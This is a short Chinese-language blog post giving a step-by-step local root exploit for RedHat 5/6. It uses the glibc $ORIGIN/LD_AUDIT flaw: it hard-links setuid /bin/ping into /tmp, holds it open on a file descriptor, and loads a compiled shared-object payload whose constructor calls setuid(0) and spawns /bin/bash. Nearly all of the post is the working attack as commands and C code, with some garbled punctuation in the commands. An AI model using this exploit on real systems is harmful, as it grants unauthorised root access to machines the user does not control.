Redhat利用漏洞提權

漏洞試用系統:redhat 56通用

 

.利用/tmp擁有777的權限

/tmp下創建一個exploit目錄

 

ln   /bin/pingping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這裏是root

 

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/


 

 

.vim編寫一段C語言程序(文件名payload.c

 

void  __attribute__((constructor))  init()  //這裏__是兩個下劃線

{

         setuid(0);

         system(“/bin/bash”);

}


 

使用GCC把這個文件編譯一下

 

Gcc -w –fpic –shared –o /tmp/exploit payload.c

 

 

.執行

 

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章